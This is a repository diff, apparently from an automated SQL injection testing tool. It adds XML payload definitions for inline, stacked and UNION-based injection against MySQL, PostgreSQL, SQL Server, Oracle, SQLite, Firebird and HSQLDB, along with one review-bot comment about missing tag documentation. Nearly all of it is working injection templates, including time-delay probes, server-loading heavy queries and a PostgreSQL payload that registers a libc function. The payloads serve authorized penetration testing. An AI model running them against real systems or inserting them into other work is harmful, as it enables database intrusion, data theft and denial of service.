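+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+        </details>
+    </test>
+    <test>
+        <title>Firebird inline queries</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!-- End of inline queries tests -->
+</root>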
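Review bot: The new `xml/payloads/03_inline_query.xml` has no header comment explaining the numeric codes its tests depend on (`<stype>6</stype>`, `<risk>1</risk>`, `<clause>1,2,3,8</clause>`, `<where>3</where>`). The only tag reference visible in this commit is the comment at the top of `xml/payloads/01_boolean_blind.xml`, so anyone auditing which tests a given level or risk setting enables has to know to look there. A one-line pointer after the XML declaration would be enough, e.g. `<!-- Tag reference: see the header comment in xml/payloads/01_boolean_blind.xml -->`. Separately, the "Microsoft SQL Server/Sybase inline queries" test lists `<os>Windows</os>` beside both `<dbms>` entries. Sybase also runs on Unix-like hosts, so if the consumer uses this value as an OS fingerprint (not visible here), the hint should be dropped or the test split per DBMS.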
							
								
								
									
										337
									
								
								xml/payloads/04_stacked_queries.xml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
									
								
							| 
						 | 
				
			
			@ -0,0 +1,337 @@
 | 
			
		|||
<?xml version="1.0" encoding="UTF-8"?>
 | 
			
		||||
 | 
			
		||||
<root>
 | 
			
		||||
    <!-- Stacked queries tests -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL > 5.0.11 stacked queries (SELECT)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>> 5.0.11</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL > 5.0.11 stacked queries (SELECT - comment)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>> 5.0.11</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL > 5.0.11 stacked queries</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT SLEEP([SLEEPTIME])</payload>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
            <dbms_version>> 5.0.11</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL < 5.0.12 stacked queries (heavy query)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[DELAYED]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL > 8.1 stacked queries</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
            <dbms_version>> 8.1</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL stacked queries (heavy query)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[DELAYED]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>PostgreSQL < 8.2 stacked queries (Glibc)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>PostgreSQL</dbms>
 | 
			
		||||
            <dbms_version>< 8.2</dbms_version>
 | 
			
		||||
            <os>Linux</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Microsoft SQL Server/Sybase stacked queries</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Microsoft SQL Server</dbms>
 | 
			
		||||
            <dbms>Sybase</dbms>
 | 
			
		||||
            <os>Windows</os>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle stacked queries (heavy query)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[DELAYED]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Oracle</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>SQLite > 2.0 stacked queries (heavy query)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[DELAYED]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>SQLite</dbms>
 | 
			
		||||
            <dbms_version>> 2.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Firebird stacked queries (heavy query)</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>2</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[DELAYED]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>Firebird</dbms>
 | 
			
		||||
            <dbms_version>>= 2.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>HSQLDB >= 1.7.2 stacked queries</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>HSQLDB</dbms>
 | 
			
		||||
            <dbms_version>>= 1.7.2</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>HSQLDB >= 2.0 stacked queries</title>
 | 
			
		||||
        <stype>4</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>0</risk>
 | 
			
		||||
        <clause>0</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
 | 
			
		||||
            <comment>--</comment>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <time>[SLEEPTIME]</time>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>HSQLDB</dbms>
 | 
			
		||||
            <dbms_version>>= 2.0</dbms_version>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
 | 
			
		||||
    <!-- End of stacked queries tests -->
 | 
			
		||||
</root>
 | 
			
		||||
							
								
								
									
										1574
									
								
								xml/payloads/05_time_blind.xml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										1574
									
								
								xml/payloads/05_time_blind.xml
									
									
									
									
									
										Normal file
									
								
							
										
											
												File diff suppressed because it is too large
											
										
									
								
							
							
								
								
									
										742
									
								
								xml/payloads/06_union_query.xml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										742
									
								
								xml/payloads/06_union_query.xml
									
									
									
									
									
										Normal file
									
								
							| 
						 | 
				
			
			@ -0,0 +1,742 @@
 | 
			
		|||
<?xml version="1.0" encoding="UTF-8"?>
 | 
			
		||||
 | 
			
		||||
<root>
 | 
			
		||||
    <!-- UNION query tests -->
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>[COLSTART]-[COLSTOP]</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>[COLSTART]-[COLSTOP]</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>[COLSTART]-[COLSTOP]</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>1-10</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>1-10</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>1-10</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>11-20</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>11-20</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
